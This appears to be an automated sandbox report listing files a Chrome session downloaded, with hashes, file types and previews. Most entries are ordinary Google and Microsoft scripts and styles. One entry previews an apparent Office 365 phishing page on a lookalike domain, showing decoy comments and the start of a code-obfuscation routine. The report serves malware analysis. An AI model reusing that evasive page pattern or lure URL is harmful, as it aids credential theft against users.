                                                          Preview:<script type="text/javascript">!function(t,e){for(var s in e)t[s]=e[s]}(this,function(t){function e(n){if(s[n])return s[n].exports;var i=s[n]={exports:{},id:n,loaded:!1};return t[n].call(i.exports,i,i.exports,e),i.loaded=!0,i.exports}var s={};return e.m=t,e.c=s,e.p="",e(0)}([function(t,e){function s(t){for(var e=f[S],s=0,n=e.length;s<n;++s)if(e[s]===t)return!0;return!1}function n(t){if(!t)return null;for(var e=t+"=",s=document.cookie.split(";"),n=0,i=s.length;n<i;n++){var a=s[n].replace(/^\s*(\w+)\s*=\s*/,"$1=").replace(/(\s+$)/,"");if(0===a.indexOf(e))return a.substring(e.length)}return null}function i(t,e,s){if(t)for(var n=t.split(":"),i=null,a=0,r=n.length;a<r;++a){var c=null,S=n[a].split("$");if(0===a&&(i=parseInt(S.shift()),!i))return;var l=S.length;if(l>=1){var p=o(i,S[0]);if(!p||s[p])continue;c={signInName:p,idp:"msa",isSignedIn:!0}}if(l>=3&&(c.firstName=o(i,S[1]),c.lastName=o(i,S[2])),l>=4){var f=S[3],d=f.split("|");c.otherHashedAliases=d}if(l>=5){var h=parseInt(S[4],16);h&&(c.
                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          File Type:ASCII text, with very long lines (33488)
                                                          Category:downloaded
                                                          Size (bytes):523391
                                                          Entropy (8bit):5.276198415022604
                                                          Encrypted:false
                                                          SSDEEP:
                                                          MD5:DC5F5B1BCEB6D751282E0826875E4036
                                                          SHA1:39EB80F2E62735949C6C8AC64C9E98936FC005C8
                                                          SHA-256:380AFD313F2AF11BCFC39F575E69A84FB2DBB8F775AD50DAD030436154AF6007
                                                          SHA-512:24C30E424C9AF89D9EF91E4F8476D770AD3D39D8F4AABF04BB33F72FBE4EE44806F376433185B8B78B7BE541906A57B31FE0FA0D3ED87AF33F638C876FA8399E
                                                          Malicious:false
                                                          Reputation:unknown
                                                          URL:https://www.gstatic.com/_/datastudio/_/js/k=datastudio.datastudio.en_US.tytJGKF--yA.2018.O/am=AAQ/d=0/rs=AHAPuoNgmn8nHiFxpdI-zUWawNUWuKyBCA/m=pm_firebase
                                                          Preview:"use strict";this.default_datastudio=this.default_datastudio||{};(function(_){var window=this;.try{._.lg_$f("pm_firebase");._.lg_La('/**\n * @license\n * Copyright 2024 Google LLC.\n * SPDX-License-Identifier: Apache-2.0\n */\n\n!function(e,t){"object"==typeof exports&&"undefined"!=typeof module?module.exports=t():"function"==typeof define&&define.amd?define(t):(e="undefined"!=typeof globalThis?globalThis:e||self).firebase=t()}(this,function(){"use strict";const r=function(t){const r=[];let n=0;for(let i=0;i<t.length;i++){let e=t.charCodeAt(i);e<128?r[n++]=e:(e<2048?r[n++]=e>>6|192:(55296==(64512&e)&&i+1<t.length&&56320==(64512&t.charCodeAt(i+1))?(e=65536+((1023&e)<<10)+(1023&t.charCodeAt(++i)),r[n++]=e>>18|240,r[n++]=e>>12&63|128):r[n++]=e>>12|224,r[n++]=e>>6&63|128),r[n++]=63&e|128)}return r},n={byteToCharMap_:null,charToByteMap_:null,byteToCharMapWebSafe_:null,charToByteMapWebSafe_:null,ENCODED_VALS_BASE:"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789",get ENCODED_VA
                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 113424
                                                          Category:downloaded
                                                          Size (bytes):20410
                                                          Entropy (8bit):7.980582012022051
                                                          Encrypted:false
                                                          SSDEEP:
                                                          MD5:3BA4D76A17ADD0A6C34EE696F28C8541
                                                          SHA1:5E8A4B8334539A7EAB798A7799F6E232016CB263
                                                          SHA-256:17D6FF63DD857A72F37292B5906B40DC087EA27D7B1DEFCFA6DD1BA82AEA0B59
                                                          SHA-512:8DA16A9759BB68A6B408F9F274B882ABB3EE7BA19F888448E495B721094BDB2CE5664E9A26BAE306A00491235EB94C143E53F618CCD6D50307C3C7F2EF1B4455
                                                          Malicious:false
                                                          Reputation:unknown
                                                          URL:https://aadcdn.msauth.net/ests/2.1/content/cdnbundles/converged.v2.login.min_81imvbluez-v5hbzpkxfcg2.css
                                                          Preview:...........}k..6..w...R..J.H=GSI..x.9...}T*.....)Q..f<...~.F.h..x..{+.-.....h..n....</v.ev......W.,.bU..rW.I...0x...C..2...6]..W_......../x.........~.z.}.|.#x......Ag*O.|XgU...4 .^'U...mP.A.].Z.U.!..Y.......:.ve.?.!..d.N...xJ...mR......0.@p...lKr/...E.-. .....|l.4.o.i.......L.iF..T{.n....2....VEY.y=..=..T+V./.b....\....7.sH.w{.h.....!.."F.k.!.......d...mS.rh.&G.../..h&..RE"!.A/.......A....L...8.q.M...t[...R...>.6;R..^.Vu..9.[F........>A.:HT}w]......2........p......'T.^]}.^..yJ>.<..pq..h.|..j....j.x..-...c...f...=".)..U.X'.M..l.]ZVtl\.I..}.0.~B0Y'.N...E.4.Xd..e...a.........."..9+d.&..l.$E..R.u.g.Q..w&...~I. .y..D.4;..'.."-.....b...)k.n.M...,3J.z_..&2f.h;.&.R.y..P..X.....\P....*.r...B.$........<....H5.M.."'#.6mQl..mQ5.=.\...O.....^..jM..u*.F..Oh.lNI..j..T..u...I..._........{.\...{..._|..={O..z..>......x..5Q.D7?{...^...^.......o.=.z......v......z.C...Gtw...0!..M@....^...^.x..G....W...{...)..y.<c3...^>{......7._..'d__...;R.
                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          File Type:HTML document, Unicode text, UTF-8 text, with very long lines (63562)
                                                          Category:downloaded
                                                          Size (bytes):203017
                                                          Entropy (8bit):3.3310970076404924
                                                          Encrypted:false
                                                          SSDEEP:
                                                          MD5:45C9344868ACC416EB159CE29C8F2F9D
                                                          SHA1:B75D743FF20895F6290433DFD7B89036D8CFEE21
                                                          SHA-256:C3F5EA2F8EC2DD469AC8601AA16FEDAF3B511724456F3BE50CC9F4535D6E5FD4
                                                          SHA-512:6ED700860D6E8D1ECF37A59702773C78A10208927A31627693B7C4539A0F5EB4B71BCE30C4545B9B8C4A7CDAD0D21866BE6949D3E7BB8D2AA0B94A56D5C19BD9
                                                          Malicious:false
                                                          Reputation:unknown
                                                          URL:https://documentsclouddatacenterfiles.com/EyIqNHAA?office365cloud=true
                                                          Preview:. <!DOCTYPE html>. <html lang="en">. <head>. The silversmith shaped metal into delicate, intricate jewelry. -->. <meta charset="UTF-8">. <meta name="viewport" content="width=device-width, initial-scale=1.0">. The blacksmith.s forge glowed with the fire of creation. -->. </head>. <body>. . The mosaic artist pieced together colors into a breathtaking image. -->. <script>. (function() {. var obfuscateCode = function(code) {. var chars = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ';. var newVars = {};. . code = code.replace(/vars+([a-zA-Z_$][0-9a-zA-Z_$]*)/g, function(match, p1) {. if (!newVars[p1]) {. newVars[p1] = chars[Math.floor(Math.random() * chars.length)] + Math.floor(Math.random() * 1000);. }. return 'var ' + newVars[p1];. });. . code
                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          File Type:ASCII text, with very long lines (4434)
                                                          Category:dropped
                                                          Size (bytes):74412
                                                          Entropy (8bit):5.584973743395722
                                                          Encrypted:false
                                                          SSDEEP:
                                                          MD5:FD4941E98246C339EE5F8F8DC026B55A
                                                          SHA1:C8BC62192864AA8B46534798C0CB958E1D4F3D2C
                                                          SHA-256:DA40E60174C29EBC2FC32B3765413514273B8C3FBD92ADDD2B58EB74C1DFAA2B
                                                          SHA-512:3BD42E53A3921654BC404ABA546B900A01EF16E9B5DBE2A04D28846E8F7965C6D7D0D171C83063294230FD8FD3331F9062A1AC991D5CF7A509E20E9BECA1AEEF
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:gapi.loaded_0(function(_){var window=this;._._F_toggles_initialize=function(a){(typeof globalThis!=="undefined"?globalThis:typeof self!=="undefined"?self:this)._F_toggles=a||[]};(0,_._F_toggles_initialize)([]);.var ca,da,ha,ma,xa,Aa,Ba;ca=function(a){var b=0;return function(){return b<a.length?{done:!1,value:a[b++]}:{done:!0}}};da=typeof Object.defineProperties=="function"?Object.defineProperty:function(a,b,c){if(a==Array.prototype||a==Object.prototype)return a;a[b]=c.value;return a};.ha=function(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var c=a[b];if(c&&c.Math==Math)return c}throw Error("a");};_.la=ha(this);ma=function(a,b){if(b)a:{var c=_.la;a=a.split(".");for(var d=0;d<a.length-1;d++){var e=a[d];if(!(e in c))break a;c=c[e]}a=a[a.length-1];d=c[a];b=b(d);b!=d&&b!=null&&da(c,a,{configurable:!0,writable:!0,value:b})}};.ma("Symbol",function(a){if(a)return a;var b
                                                          No static file info